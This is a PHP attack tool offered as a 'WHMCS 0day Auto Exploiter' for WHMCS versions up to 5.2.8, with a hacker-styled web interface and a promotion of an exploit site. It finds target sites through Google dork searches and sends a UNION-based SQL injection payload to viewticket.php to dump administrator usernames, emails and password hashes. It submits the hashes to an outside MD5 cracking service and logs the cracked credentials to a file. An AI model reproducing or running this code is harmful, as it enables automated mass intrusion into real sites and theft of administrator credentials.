WHMCS 0day Auto Exploiter <= 5.2.8 - DECRYPT

1. <?php
2. /*
3. *****************************************************
4.         WHMCS 0day Auto Exploiter <= 5.2.8
5.         Coded by g00n - Skype: t3hg00n
6.         MD5 Decrypt by Cap'n V00D00 - Skype: capnsharkbait
7.             wwww.xploiter.net
8. *****************************************************
9. Preview:
10. http://i.imgur.com/qB726Gm.png
11. In action:
12. http://i.imgur.com/oNpZAf6.png
13. http://i.imgur.com/gFlBjtD.png
14. *****************************************************
15. */
16.  
17. set_time_limit(0);
18. ini_set('memory_limit', '64M');
19. header('Content-Type: text/html; charset=UTF-8');
20. function letItBy(){ ob_flush(); flush(); }
21. function getAlexa($url)
22. {
23.     $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
24.     $rank1 = $xml->SD[1];
25.     if($rank1)
26.         $rank = $rank1->POPULARITY->attributes()->TEXT;
27.     else
28.         $rank = 0;
29.     return $rank;
30. }
31.  
32. function decryptmd5($hash){
33.     $url = 'http://www.md5online.org/';
34.     $data = array('md5' => $hash, 'action' => 'decrypt', 'a' => '73981820');
35.     $options = array(
36.         'http' => array(
37.             'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
38.             'method'  => 'POST',
39.             'content' => http_build_query($data),
40.         )
41.     );
42.     $context = stream_context_create($options);
43.     $result = file_get_contents($url, false, $context);
44.     $result = str_replace("\n", '', str_replace(" ", '', $result));
45.     $result = explode("<br/><spanstyle='color:limegreen'>Found:<b>", $result);
46.     $result = explode("</b>", $result[1]);
47.  
48.     return $result[0] ? $result[0] : false;
49. }
50.    
51. function google_that($query, $page=1)
52. {
53.     $resultPerPage=8;
54.     $start = $page*$resultPerPage;
55.     $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
56.     $resultFromGoogle = json_decode( http_get($url, true) ,true);
57.     if(isset($resultFromGoogle['responseStatus'])) {
58.         if($resultFromGoogle['responseStatus'] != '200') return false;
59.         if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
60.         else return $resultFromGoogle['responseData']['results'];
61.     }
62.     else
63.         die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
64. }
65.    
66. function http_get($url, $safemode = false){
67.     if($safemode === true) sleep(1);
68.     $im = curl_init($url);
69.     curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
70.     curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
71.     curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
72.     curl_setopt($im, CURLOPT_HEADER, 0);
73.     return curl_exec($im);
74.     curl_close();
75. }
76.  
77. function check_vuln($url) {
78. $url = dirname($url) . '/viewticket.php';
79. $url = str_replace("/admin","",$url);
80.  
81. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
82. $curl_connection = curl_init($url);
83. if($curl_connection != false) {
84.     curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
85.     curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
86.     curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
87.     curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
88.     curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
89.     curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
90.     $source = curl_exec($curl_connection);
91.     preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
92.     if($infoz[0]) {
93.         return $infoz[0];
94.     }
95.     else
96.         return "Fail!";
97. }
98. else
99.     return "Fail!";
100. }
101. ?>
102. <html>
103. <head>
104. <title>WHMCS Auto Xploiter - by g00n</title>
105. </head>
106. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
107.  
108. <STYLE>
109. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
110. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
111. body {
112. font-family: Tahoma
113. }
114. tr {
115. BORDER: dashed 1px #333;
116. color: #FFF;
117. }
118. td {
119. BORDER: dashed 1px #333;
120. color: #FFF;
121. }
122. .table1 {
123. BORDER: 0px Black;
124. BACKGROUND-COLOR: Black;
125. color: #FFF;
126. }
127. .td1 {
128. BORDER: 0px;
129. BORDER-COLOR: #333333;
130. font: 7pt Verdana;
131. color: Green;
132. }
133. .tr1 {
134. BORDER: 0px;
135. BORDER-COLOR: #333333;
136. color: #FFF;
137. }
138. table {
139. BORDER: dashed 1px #333;
140. BORDER-COLOR: #333333;
141. BACKGROUND-COLOR: Black;
142. color: #FFF;
143. }
144. input {
145. border          : dashed 1px;
146. border-color        : #333;
147. BACKGROUND-COLOR: Black;
148. font: 8pt Verdana;
149. color: Red;
150. }
151. select {
152. BORDER-RIGHT:  Black 1px solid;
153. BORDER-TOP:    #DF0000 1px solid;
154. BORDER-LEFT:   #DF0000 1px solid;
155. BORDER-BOTTOM: Black 1px solid;
156. BORDER-color: #FFF;
157. BACKGROUND-COLOR: Black;
158. font: 8pt Verdana;
159. color: Red;
160. }
161. submit {
162. BORDER:  buttonhighlight 2px outset;
163. BACKGROUND-COLOR: Black;
164. width: 30%;
165. color: #FFF;
166. }
167. textarea {
168. border          : dashed 1px #333;
169. BACKGROUND-COLOR: Black;
170. font: Fixedsys bold;
171. color: #999;
172. }
173. BODY {
174.     SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
175. margin: 1px;
176. color: Red;
177. background-color: Black;
178. }
179. .main {
180. margin          : -287px 0px 0px -490px;
181. BORDER: dashed 1px #333;
182. BORDER-COLOR: #333333;
183. }
184. .tt {
185. background-color: Black;
186. }
187.  
188. A:link {
189.     COLOR: White; TEXT-DECORATION: none
190. }
191. A:visited {
192.     COLOR: White; TEXT-DECORATION: none
193. }
194. A:hover {
195.     color: Red; TEXT-DECORATION: none
196. }
197. A:active {
198.     color: Red; TEXT-DECORATION: none
199. }
200.  
201. #result{margin:10px;}
202. #result span{display:block;}
203. #result .Y{background-color:green;}
204. #result .X{background-color:red;}
205. </STYLE>
206. <script language=\'javascript\'>
207. function hide_div(id)
208. {
209.   document.getElementById(id).style.display = \'none\';
210.   document.cookie=id+\'=0;\';
211. }
212. function show_div(id)
213. {
214.   document.getElementById(id).style.display = \'block\';
215.   document.cookie=id+\'=1;\';
216. }
217. function change_divst(id)
218. {
219.   if (document.getElementById(id).style.display == \'none\')
220.     show_div(id);
221.   else
222.     hide_div(id);
223. }
224. </script>
225. </td></table></tr>
226. <br>
227. <br>
228. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
229.     <style>
230.       body {
231.         font-family: 'Audiowide', serif;
232.         font-size: 30px;
233.        
234.       }
235.     </style>
236.   </head>
237.  
238.   <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
239.     <center>
240. <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
241. <br>
242. <font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
243. </font>
244. <br><br>
245.  
246. <table border=1 bordercolor=red>
247. <tr>
248. <td width="700">
249. <br />
250. <center>
251.     <form method="post">
252.         Google Dork: &nbsp;&nbsp;
253.         <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
254.         &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
255.     </form>
256. <?php
257.     if(isset($_POST['dork']{0})) {
258.         $file = fopen("WMCS-Hashes.txt","a");
259.         echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';           
260.         letItBy();         
261.         for($googlePage = 1; $googlePage <= 50; $googlePage++) {
262.             $googleResult = google_that($_POST['dork'], $googlePage);
263.             if(!$googleResult) {
264.                 echo 'Finished scanning.';
265.                 fclose($file);
266.                 break;
267.             }
268.            
269.             for($victim = 0; $victim < sizeof($googleResult); $victim++){
270.                 $result = check_vuln($googleResult[$victim]['unescapedUrl']);
271.                 $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
272.                 if($result != "Fail!") {
273.                     $hashes = "";
274.                     $hashes2 = "";
275.                     foreach ($result as $record) {
276.                         $hashes = $hashes . str_replace(':::::','',$record) . "\n";
277.  
278.                         foreach(explode("\n",$hashes) as $indx => $hash){
279.                             $hash = explode(":",$hash);
280.                             $dcrpt = decryptmd5($hash[count($hash)-1]);
281.                             $hash[count($hash)-1] = $dcrpt ? $dcrpt : $hash[count($hash)-1];
282.                             $hashes2 .= implode(':',$hash);
283.                         }
284.  
285.                     }
286.                     $hashes = $hashes2;
287.                     $sep = "========================================================\n";
288.                     $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
289.                     fwrite($file,$data);
290.                     echo "<br /><font color=\"green\">Successfully Xploited...</font>";
291.                     echo '<span class="Y">';
292.                     echo "<pre>" . $data . "</pre></span><br />";
293.                    
294.                 }
295.                 else {
296.                 echo '<span class="X">';
297.                 echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
298.                 echo "</span>\n<br />";
299.                 }
300.                 letItBy();
301.             }
302.         }
303.         echo '</div>';
304.     }
305. ?>
306. </center>
307. </td>
308. </table>
309. <br /><br />
310. <font face="Audiowide" color="red" size="2">
311. Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br />
312. MD5 Decrypt by: <font color="white">Cap'n V00d00</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:capnsharkbait">capnsharkbait</a></font><br /><br />
313. <br > <font color="green">For more tools/scripts/exploits/etc.</font>
314. <br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
315. </font>
316.  
317. </center>
318. </body>
319. </html>